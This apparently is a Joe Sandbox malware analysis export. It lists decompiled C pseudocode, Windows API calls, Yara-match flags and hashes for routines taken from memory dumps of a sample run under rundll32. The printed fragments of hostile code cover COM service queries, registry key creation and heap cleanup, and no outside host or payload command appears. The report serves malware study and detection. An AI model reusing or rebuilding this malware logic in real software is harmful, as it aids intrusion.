                                            0x049f4132
                                            0x049f4132
                                            0x049f413f
                                            0x049f4144
                                            0x049f4149
                                            0x049f4151
                                            0x049f4157
                                            0x049f4159
                                            0x049f415c
                                            0x049f4160
                                            0x049f4162
                                            0x049f4165
                                            0x049f4165
                                            0x049f4166
                                            0x049f4168
                                            0x049f4165
                                            0x049f4172
                                            0x049f4175
                                            0x049f4178
                                            0x049f4179
                                            0x049f417b
                                            0x049f4182
                                            0x049f4182
                                            0x049f418e

                                            APIs
                                            • StrChrA.SHLWAPI(?,00000020,00000000,04F795AC,?,?,049F6940,?,04F795AC), ref: 049F4133
                                            • StrTrimA.SHLWAPI(?,049F9284,00000002,?,049F6940,?,04F795AC), ref: 049F4151
                                            • StrChrA.SHLWAPI(?,00000020,?,049F6940,?,04F795AC), ref: 049F415C
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: Trim
                                            • String ID:
                                            • API String ID: 3043112668-0
                                            • Opcode ID: 4a214729d08908cf23de0094841b1a4f8825d49e2cdf7c9bc065af674863d612
                                            • Instruction ID: ab7fee97a783eacdb5f6190436cd6a025ce59970257c98c0344962c1c1edbc7d
                                            • Opcode Fuzzy Hash: 4a214729d08908cf23de0094841b1a4f8825d49e2cdf7c9bc065af674863d612
                                            • Instruction Fuzzy Hash: 3201BC713043666FE7204E2A9C44F637A9DEBF5354F040032BB55CB282DA30E802C760
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 049F3E6C Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 48COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 64%
                                            			E049F3E6C(intOrPtr __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v60;
				char _v64;
				long _t14;
				intOrPtr _t18;
				intOrPtr _t19;
				intOrPtr _t26;
				intOrPtr _t27;
				long _t28;

				_t27 = __edi;
				_t26 = _a8;
				_t14 = E049F3C00(_a4, _t26, __edi); // executed
				_t28 = _t14;
				if(_t28 != 0) {
					memset( &_v60, 0, 0x38);
					_t18 =  *0x49fa348; // 0x57d5a8
					_t28 = 0;
					_v64 = 0x3c;
					if(_a12 == 0) {
						_t7 = _t18 + 0x49fb4e8; // 0x70006f
						_t19 = _t7;
					} else {
						_t6 = _t18 + 0x49fb8ec; // 0x750072
						_t19 = _t6;
					}
					_v52 = _t19;
					_push(_t28);
					_v48 = _a4;
					_v44 = _t26;
					_v36 = _t27;
					E049F37E9();
					_push( &_v64);
					if( *0x49fa100() == 0) {
						_t28 = GetLastError();
					}
					_push(1);
					E049F37E9();
				}
				return _t28;
			}















                                            0x049f3e6c
                                            0x049f3e73
                                            0x049f3e7c
                                            0x049f3e81
                                            0x049f3e85
                                            0x049f3e8f
                                            0x049f3e94
                                            0x049f3e99
                                            0x049f3e9e
                                            0x049f3ea8
                                            0x049f3eb2
                                            0x049f3eb2
                                            0x049f3eaa
                                            0x049f3eaa
                                            0x049f3eaa
                                            0x049f3eaa
                                            0x049f3eb8
                                            0x049f3ebe
                                            0x049f3ebf
                                            0x049f3ec2
                                            0x049f3ec5
                                            0x049f3ec8
                                            0x049f3ed0
                                            0x049f3ed9
                                            0x049f3ee1
                                            0x049f3ee1
                                            0x049f3ee3
                                            0x049f3ee5
                                            0x049f3ee5
                                            0x049f3eef

                                            APIs
                                              • Part of subcall function 049F3C00: SysAllocString.OLEAUT32(00000000), ref: 049F3C5A
                                              • Part of subcall function 049F3C00: SysAllocString.OLEAUT32(0070006F), ref: 049F3C6E
                                              • Part of subcall function 049F3C00: SysAllocString.OLEAUT32(00000000), ref: 049F3C80
                                            • memset.NTDLL ref: 049F3E8F
                                            • GetLastError.KERNEL32 ref: 049F3EDB
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: AllocString$ErrorLastmemset
                                            • String ID: <
                                            • API String ID: 3736384471-4251816714
                                            • Opcode ID: a3e97b175bd97787d2b0e1852eea478b33e55042a60f8ec3c7ecfe530cdeedbe
                                            • Instruction ID: 67d29aec3a893fcdd56d77a096ed050bd96b7eb7ca2bcc31f52ba7e5de484dae
                                            • Opcode Fuzzy Hash: a3e97b175bd97787d2b0e1852eea478b33e55042a60f8ec3c7ecfe530cdeedbe
                                            • Instruction Fuzzy Hash: 9F014071A00218ABDB21EFA5DC88EDE7BBCAF48744F014435FE04E7200E779A9458B90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0581BAC0 Relevance: 4.5, APIs: 3, Instructions: 40registrystringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RegCreateKeyA.ADVAPI32(80000001,05D7B7F0,?), ref: 0581BAD5
                                            • RegOpenKeyA.ADVAPI32(80000001,05D7B7F0,?), ref: 0581BADF
                                            • lstrlen.KERNEL32(05D7B7F0,00000000,00000000,0582806E,?,?,?,05806B9D,00000001,00000000,?), ref: 0581BAFE
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateOpenlstrlen
                                            • String ID:
                                            • API String ID: 2865187142-0
                                            • Opcode ID: a0450831300758bae34b8e15beeb25197d875800b4381b934aa5ae7a3281f72d
                                            • Instruction ID: 620074dffcad3cc083b4e106a25ef47b420d760685e9e2c81f9eb121e29e91fc
                                            • Opcode Fuzzy Hash: a0450831300758bae34b8e15beeb25197d875800b4381b934aa5ae7a3281f72d
                                            • Instruction Fuzzy Hash: C1F09672200208BFEB219F90DC89EAB7F6CEB45795F10C005FD06D5140D6709D80CB75
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05813EC0 Relevance: 4.5, APIs: 3, Instructions: 18memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • SetEvent.KERNEL32(00000598,05819D32), ref: 05813ECA
                                              • Part of subcall function 058044CE: SleepEx.KERNEL32(00000064,00000001,00000000,?,?,?,05813ED5), ref: 058044F7
                                              • Part of subcall function 058044CE: RtlDeleteCriticalSection.NTDLL(05829400), ref: 0580452A
                                              • Part of subcall function 058044CE: RtlDeleteCriticalSection.NTDLL(05829420), ref: 05804531
                                              • Part of subcall function 058044CE: ReleaseMutex.KERNEL32(000005A8,00000000,?,?,?,05813ED5), ref: 0580455A
                                              • Part of subcall function 058044CE: CloseHandle.KERNEL32(?,?,05813ED5), ref: 05804566
                                              • Part of subcall function 058044CE: ResetEvent.KERNEL32(00000000,00000000,?,?,?,05813ED5), ref: 05804572
                                              • Part of subcall function 058044CE: CloseHandle.KERNEL32(?,?,05813ED5), ref: 0580457E
                                              • Part of subcall function 058044CE: SleepEx.KERNEL32(00000064,00000001,00000000,?,?,?,05813ED5), ref: 05804584
                                              • Part of subcall function 058044CE: SleepEx.KERNEL32(00000064,00000001,?,?,05813ED5), ref: 05804598
                                              • Part of subcall function 058044CE: HeapFree.KERNEL32(00000000,00000000,?,?,05813ED5), ref: 058045BC
                                              • Part of subcall function 058044CE: RtlRemoveVectoredExceptionHandler.NTDLL(056F05B8), ref: 058045F2
                                              • Part of subcall function 058044CE: SleepEx.KERNEL32(00000064,00000001,?,?,05813ED5), ref: 0580460E
                                            • CloseHandle.KERNEL32(00000598), ref: 05813EDF
                                            • HeapDestroy.KERNELBASE(05980000), ref: 05813EEF
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Sleep$CloseHandle$CriticalDeleteEventHeapSection$DestroyExceptionFreeHandlerMutexReleaseRemoveResetVectored
                                            • String ID:
                                            • API String ID: 2773679374-0
                                            • Opcode ID: 70ab1d35326c546a307556586c99b52b149bd222daff552ebd126a4252eca8d5
                                            • Instruction ID: c5e4b2234a08a486b306c819d8a646e06db927dee2d0da10f6d8a56d9efb6737
                                            • Opcode Fuzzy Hash: 70ab1d35326c546a307556586c99b52b149bd222daff552ebd126a4252eca8d5
                                            • Instruction Fuzzy Hash: 60E04C707243059BDF60AB76A88EE573F9C7A145417084854FC46D2990EF65E8809A2A
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 049F55D3 Relevance: 3.8, APIs: 3, Instructions: 82COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E049F55D3(void* _a4, intOrPtr _a8, intOrPtr _a12) {
				int _v12;
				signed int _v16;
				void* _v20;
				signed char _v36;
				void* _t24;
				intOrPtr _t27;
				void* _t35;
				signed int _t38;
				signed char* _t46;
				int _t53;
				void* _t55;
				void* _t56;
				void* _t57;

				_v16 = _v16 & 0x00000000;
				_t46 = _a4;
				_t53 = ( *_t46 & 0x000000ff) + 0x110;
				_v12 = 0x110;
				_t24 = E049F4DF6(_t53);
				_a4 = _t24;
				if(_t24 != 0) {
					memcpy(_t24,  *0x49fa378, 0x110);
					_t27 =  *0x49fa37c; // 0x0
					_t57 = _t56 + 0xc;
					if(_t27 != 0) {
						_t51 = _a4;
						E049F29B5(0x110, _a4, _a4, _t27, 0);
					}
					if(E049F66A9( &_v36) != 0) {
						_t35 = E049F3072(0x110, 0,  &_v36, _a4,  &_v20,  &_v12); // executed
						if(_t35 == 0) {
							_t55 = _v20;
							_v36 =  *_t46;
							_t38 = E049F17E5(_t55, _a8, _t51, _t46, _a12); // executed
							_v16 = _t38;
							 *(_t55 + 4) = _v36;
							_t20 =  &(_t46[4]); // 0xbf0845c7
							memset(_t55, 0, _v12 - ( *_t20 & 0xf));
							_t57 = _t57 + 0xc;
							E049F4C73(_t55);
						}
					}
					memset(_a4, 0, _t53);
					E049F4C73(_a4);
				}
				return _v16;
			}
















                                            0x049f55d9
                                            0x049f55de
                                            0x049f55eb
                                            0x049f55ee
                                            0x049f55f1
                                            0x049f55f6
                                            0x049f55fb
                                            0x049f5609
                                            0x049f560e
                                            0x049f5613
                                            0x049f5618
                                            0x049f561a
                                            0x049f5623
                                            0x049f5623
                                            0x049f5632
                                            0x049f5647
                                            0x049f564e
                                            0x049f5655
                                            0x049f565b
                                            0x049f5661
                                            0x049f5669
                                            0x049f566f
                                            0x049f5672
                                            0x049f567f
                                            0x049f5684
                                            0x049f5688
                                            0x049f5688
                                            0x049f564e
                                            0x049f5693
                                            0x049f569e
                                            0x049f569e
                                            0x049f56aa

                                            APIs
                                              • Part of subcall function 049F4DF6: RtlAllocateHeap.NTDLL(00000000,00000000,049F5522), ref: 049F4E02
                                            • memcpy.NTDLL(00000000,00000110,?,?,?,?,049F6D90,?,049F58B7,049F58B7,?), ref: 049F5609
                                            • memset.NTDLL ref: 049F567F
                                            • memset.NTDLL ref: 049F5693
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: memset$AllocateHeapmemcpy
                                            • String ID:
                                            • API String ID: 1529149438-0
                                            • Opcode ID: ca41e4a0050c1534b10d532a734d6374525b8c46adad20c6fdf7b374e97828ad
                                            • Instruction ID: 0db6c0bdff918a01d911217b2db4e59a7586a1e0b500aa593bf32027e14d8e9f
                                            • Opcode Fuzzy Hash: ca41e4a0050c1534b10d532a734d6374525b8c46adad20c6fdf7b374e97828ad
                                            • Instruction Fuzzy Hash: E8213D71A00618BBEF11AFA5CC41FEE7BBCAF88654F044025FA14A6251E734EA15CBA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 058130FC Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15threadCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 058016A1: GetProcessImageFileNameW.PSAPI(?,00000000,00000800,00001000,05829190,00000000,05813103,?,0580C793,?), ref: 058016C0
                                              • Part of subcall function 058016A1: PathFindFileNameW.SHLWAPI(00000000,?,?,00000000,00000800,00001000,05829190,00000000,05813103,?,0580C793,?), ref: 058016CB
                                              • Part of subcall function 058016A1: _wcsupr.NTDLL ref: 058016D8
                                              • Part of subcall function 058016A1: lstrlenW.KERNEL32(00000000), ref: 058016E0
                                            • ResumeThread.KERNEL32(00000004,?,0580C793,?), ref: 05813111
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FileName$FindImagePathProcessResumeThread_wcsuprlstrlen
                                            • String ID: v
                                            • API String ID: 3646851950-1801730948
                                            • Opcode ID: e2b50414927bf356fdd62d89dc496716a0cb2f6bfbafc44264b70c5307bc06c0
                                            • Instruction ID: 281f3ab451788f2e4783a81553ab4586f6ce325e1c87e1dbbca467dab2166cb6
                                            • Opcode Fuzzy Hash: e2b50414927bf356fdd62d89dc496716a0cb2f6bfbafc44264b70c5307bc06c0
                                            • Instruction Fuzzy Hash: 6CD05E34204301A6DA213720CD0EB267E96BF08B58F10CC24FD99D01B0DB358C509619
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 049F1162 Relevance: 3.1, APIs: 2, Instructions: 149serviceCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 38%
                                            			E049F1162(intOrPtr _a4) {
				void* _v12;
				char _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				char _v32;
				intOrPtr _v40;
				void* _v46;
				short _v48;
				intOrPtr _t49;
				void* _t51;
				intOrPtr* _t53;
				intOrPtr _t56;
				void* _t58;
				intOrPtr* _t59;
				intOrPtr* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				short _t73;
				intOrPtr* _t74;
				intOrPtr _t77;
				intOrPtr* _t80;
				intOrPtr _t82;
				char* _t98;
				intOrPtr _t100;
				void* _t106;
				void* _t108;
				intOrPtr _t112;

				_v48 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t49 =  *0x49fa348; // 0x57d5a8
				_t4 = _t49 + 0x49fb450; // 0x4f789f8
				_t82 = 0;
				_t5 = _t49 + 0x49fb440; // 0x9ba05972
				_t51 =  *0x49fa170(_t5, 0, 4, _t4,  &_v20); // executed
				_t106 = _t51;
				if(_t106 >= 0) {
					_t53 = _v20;
					_push( &_v12);
					_push(1);
					_push( &_v32);
					_push(8);
					_t98 =  &_v48;
					_push(_t98);
					_push(_t98);
					_push(_t53); // executed
					if( *((intOrPtr*)( *_t53 + 0x3c))() == 0) {
						_t56 =  *0x49fa348; // 0x57d5a8
						_t30 = _t56 + 0x49fb430; // 0x4f789d8
						_t31 = _t56 + 0x49fb460; // 0x4c96be40
						_t58 =  *0x49fa10c(_v12, _t31, _t30,  &_v24); // executed
						_t106 = _t58;
						_t59 = _v12;
						 *((intOrPtr*)( *_t59 + 8))(_t59);
						goto L11;
					} else {
						_t71 = _v20;
						_v16 = 0;
						_t106 =  *((intOrPtr*)( *_t71 + 0x1c))(_t71,  &_v16);
						if(_t106 >= 0) {
							_t112 = _v16;
							if(_t112 == 0) {
								_t106 = 0x80004005;
								goto L11;
							} else {
								if(_t112 <= 0) {
									L11:
									if(_t106 >= 0) {
										goto L12;
									}
								} else {
									do {
										_t73 = 3;
										_v48 = _t73;
										_t74 = _v20;
										_v40 = _t82;
										_t108 = _t108 - 0x10;
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										_t106 =  *((intOrPtr*)( *_t74 + 0x20))(_t74,  &_v12);
										if(_t106 < 0) {
											goto L7;
										} else {
											_t77 =  *0x49fa348; // 0x57d5a8
											_t23 = _t77 + 0x49fb430; // 0x4f789d8
											_t24 = _t77 + 0x49fb460; // 0x4c96be40
											_t106 =  *0x49fa10c(_v12, _t24, _t23,  &_v24);
											_t80 = _v12;
											 *((intOrPtr*)( *_t80 + 8))(_t80);
											if(_t106 >= 0) {
												L12:
												_t63 = _v24;
												_t106 =  *((intOrPtr*)( *_t63 + 0x3c))(_t63,  &_v28);
												if(_t106 >= 0) {
													_t100 =  *0x49fa348; // 0x57d5a8
													_t67 = _v28;
													_t40 = _t100 + 0x49fb420; // 0x214e3
													_t106 =  *((intOrPtr*)( *_t67))(_t67, _t40, _a4);
													_t69 = _v28;
													 *((intOrPtr*)( *_t69 + 8))(_t69);
												}
												_t65 = _v24;
												 *((intOrPtr*)( *_t65 + 8))(_t65);
											} else {
												goto L7;
											}
										}
										goto L15;
										L7:
										_t82 = _t82 + 1;
									} while (_t82 < _v16);
									goto L11;
								}
							}
						}
					}
					L15:
					_t61 = _v20;
					 *((intOrPtr*)( *_t61 + 8))(_t61);
				}
				return _t106;
			}


































                                            0x049f116d
                                            0x049f1174
                                            0x049f1175
                                            0x049f1176
                                            0x049f1177
                                            0x049f117d
                                            0x049f1182
                                            0x049f118b
                                            0x049f118e
                                            0x049f1195
                                            0x049f119b
                                            0x049f119f
                                            0x049f11a5
                                            0x049f11ad
                                            0x049f11ae
                                            0x049f11b3
                                            0x049f11b4
                                            0x049f11b6
                                            0x049f11b9
                                            0x049f11ba
                                            0x049f11bb
                                            0x049f11c1
                                            0x049f1257
                                            0x049f125c
                                            0x049f1263
                                            0x049f126d
                                            0x049f1273
                                            0x049f1275
                                            0x049f127b
                                            0x00000000
                                            0x049f11c7
                                            0x049f11c7
                                            0x049f11ce
                                            0x049f11d7
                                            0x049f11db
                                            0x049f11e1
                                            0x049f11e4
                                            0x049f124c
                                            0x00000000
                                            0x049f11e6
                                            0x049f11e6
                                            0x049f127e
                                            0x049f1280
                                            0x00000000
                                            0x00000000
                                            0x049f11ec
                                            0x049f11ec
                                            0x049f11ee
                                            0x049f11f3
                                            0x049f11f7
                                            0x049f11fa
                                            0x049f11ff
                                            0x049f1207
                                            0x049f1208
                                            0x049f1209
                                            0x049f120b
                                            0x049f120f
                                            0x049f1213
                                            0x00000000
                                            0x049f1215
                                            0x049f1219
                                            0x049f121e
                                            0x049f1225
                                            0x049f1235
                                            0x049f1237
                                            0x049f123d
                                            0x049f1242
                                            0x049f1282
                                            0x049f1282
                                            0x049f128f
                                            0x049f1293
                                            0x049f1298
                                            0x049f129e
                                            0x049f12a3
                                            0x049f12ad
                                            0x049f12af
                                            0x049f12b5
                                            0x049f12b5
                                            0x049f12b8
                                            0x049f12be
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x049f1242
                                            0x00000000
                                            0x049f1244
                                            0x049f1244
                                            0x049f1245
                                            0x00000000
                                            0x049f124a
                                            0x049f11e6
                                            0x049f11e4
                                            0x049f11db
                                            0x049f12c1
                                            0x049f12c1
                                            0x049f12c7
                                            0x049f12c7
                                            0x049f12d0

                                            APIs
                                            • IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,04F789D8,049F3C2E,?,?,?,?,?,?,?,?,?,?,?,049F3C2E), ref: 049F122F
                                            • IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,04F789D8,049F3C2E,?,?,?,?,?,?,?,049F3C2E,00000000,00000000,00000000,006D0063), ref: 049F126D
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: QueryServiceUnknown_
                                            • String ID:
                                            • API String ID: 2042360610-0
                                            • Opcode ID: 5f2eb99c227444fdcb82186759339e9e652d506670062e8b3a63b3f31da245bc
                                            • Instruction ID: af25c823f754bdab679a6d4a14566e27994f91561246d4a7199ed7b90f5990a9
                                            • Opcode Fuzzy Hash: 5f2eb99c227444fdcb82186759339e9e652d506670062e8b3a63b3f31da245bc
                                            • Instruction Fuzzy Hash: 0C514375900219EFCB00DFE8C889DEEB7B9FF88714B158569EA15EB210D770AD45CBA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 049F69D2 Relevance: 3.1, APIs: 2, Instructions: 112COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 75%
                                            			E049F69D2(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
				void* _v8;
				void* __esi;
				intOrPtr* _t35;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t50;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t61;
				intOrPtr* _t65;
				intOrPtr _t68;
				void* _t72;
				void* _t75;
				void* _t76;

				_t55 = _a4;
				_t35 =  *((intOrPtr*)(_t55 + 4));
				_a4 = 0;
				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
				if(_t76 < 0) {
					L18:
					return _t76;
				}
				_t40 = E049F1000(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
				_t76 = _t40;
				if(_t76 >= 0) {
					_t61 = _a28;
					if(_t61 != 0 &&  *_t61 != 0) {
						_t52 = _v8;
						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
					}
					if(_t76 >= 0) {
						_t43 =  *_t55;
						_t68 =  *0x49fa348; // 0x57d5a8
						_t20 = _t68 + 0x49fb1fc; // 0x740053
						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
						if(_t76 >= 0) {
							_t76 = E049F2898(_a4);
							if(_t76 >= 0) {
								_t65 = _a28;
								if(_t65 != 0 &&  *_t65 == 0) {
									_t50 = _a4;
									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
								}
							}
						}
						_t45 = _a4;
						if(_t45 != 0) {
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						_t57 = __imp__#6;
						if(_a20 != 0) {
							 *_t57(_a20);
						}
						if(_a12 != 0) {
							 *_t57(_a12);
						}
					}
				}
				_t41 = _v8;
				 *((intOrPtr*)( *_t41 + 8))(_t41);
				goto L18;
			}





















                                            0x049f69d8
                                            0x049f69db
                                            0x049f69eb
                                            0x049f69f4
                                            0x049f69f8
                                            0x049f6ac6
                                            0x049f6acc
                                            0x049f6acc
                                            0x049f6a12
                                            0x049f6a17
                                            0x049f6a1b
                                            0x049f6a21
                                            0x049f6a26
                                            0x049f6a2d
                                            0x049f6a3c
                                            0x049f6a3c
                                            0x049f6a40
                                            0x049f6a42
                                            0x049f6a4e
                                            0x049f6a59
                                            0x049f6a64
                                            0x049f6a68
                                            0x049f6a72
                                            0x049f6a76
                                            0x049f6a78
                                            0x049f6a7d
                                            0x049f6a84
                                            0x049f6a94
                                            0x049f6a94
                                            0x049f6a7d
                                            0x049f6a76
                                            0x049f6a96
                                            0x049f6a9b
                                            0x049f6aa0
                                            0x049f6aa0
                                            0x049f6aa3
                                            0x049f6aac
                                            0x049f6ab1
                                            0x049f6ab1
                                            0x049f6ab6
                                            0x049f6abb
                                            0x049f6abb
                                            0x049f6ab6
                                            0x049f6a40
                                            0x049f6abd
                                            0x049f6ac3
                                            0x00000000

                                            APIs
                                              • Part of subcall function 049F1000: SysAllocString.OLEAUT32(80000002), ref: 049F105D
                                              • Part of subcall function 049F1000: SysFreeString.OLEAUT32(00000000), ref: 049F10C3
                                            • SysFreeString.OLEAUT32(?), ref: 049F6AB1
                                            • SysFreeString.OLEAUT32(049F6ECE), ref: 049F6ABB
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: String$Free$Alloc
                                            • String ID:
                                            • API String ID: 986138563-0
                                            • Opcode ID: b3e9b4e6e753b7be91aa489eb9656657089a6abc1ffcdc6c3102deea423a0d80
                                            • Instruction ID: ac63bf3c435c2a9bb00508adffdba06a6ec495d9440c7ba824d5119295f4bc9b
                                            • Opcode Fuzzy Hash: b3e9b4e6e753b7be91aa489eb9656657089a6abc1ffcdc6c3102deea423a0d80
                                            • Instruction Fuzzy Hash: E2311971500219AFCB11DF54CC88C9BBB79FFC97407248668F9159B210E632ED62DBA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 049F6615 Relevance: 3.1, APIs: 2, Instructions: 62COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 50%
                                            			E049F6615(intOrPtr* __eax, intOrPtr _a4) {
				void* _v8;
				void* _v12;
				void* _v16;
				intOrPtr* _t22;
				void* _t23;
				intOrPtr* _t24;
				intOrPtr* _t26;
				intOrPtr* _t28;
				intOrPtr* _t30;
				void* _t31;
				intOrPtr* _t32;
				intOrPtr _t42;
				intOrPtr _t45;
				intOrPtr _t48;
				void* _t51;

				_push( &_v16);
				_t42 =  *0x49fa348; // 0x57d5a8
				_t2 = _t42 + 0x49fb470; // 0x20400
				_push(0);
				_push(__eax);
				_t51 =  *((intOrPtr*)( *__eax + 0x3c))();
				if(_t51 >= 0) {
					_t22 = _v16;
					_t45 =  *0x49fa348; // 0x57d5a8
					_t6 = _t45 + 0x49fb490; // 0xe7a1af80
					_t23 =  *((intOrPtr*)( *_t22))(_t22, _t6,  &_v12); // executed
					_t51 = _t23;
					if(_t51 >= 0) {
						_t26 = _v12;
						_t51 =  *((intOrPtr*)( *_t26 + 0x1c))(_t26,  &_v8);
						if(_t51 >= 0) {
							_t48 =  *0x49fa348; // 0x57d5a8
							_t30 = _v8;
							_t12 = _t48 + 0x49fb480; // 0xa4c6892c
							_t31 =  *((intOrPtr*)( *_t30))(_t30, _t12, _a4); // executed
							_t51 = _t31;
							_t32 = _v8;
							 *((intOrPtr*)( *_t32 + 8))(_t32);
						}
						_t28 = _v12;
						 *((intOrPtr*)( *_t28 + 8))(_t28);
					}
					_t24 = _v16;
					 *((intOrPtr*)( *_t24 + 8))(_t24);
				}
				return _t51;
			}


















                                            0x049f6621
                                            0x049f6622
                                            0x049f6628
                                            0x049f662f
                                            0x049f6631
                                            0x049f6635
                                            0x049f6639
                                            0x049f663b
                                            0x049f6644
                                            0x049f664a
                                            0x049f6652
                                            0x049f6654
                                            0x049f6658
                                            0x049f665a
                                            0x049f6667
                                            0x049f666b
                                            0x049f6670
                                            0x049f6676
                                            0x049f667b
                                            0x049f6683
                                            0x049f6685
                                            0x049f6687
                                            0x049f668d
                                            0x049f668d
                                            0x049f6690
                                            0x049f6696
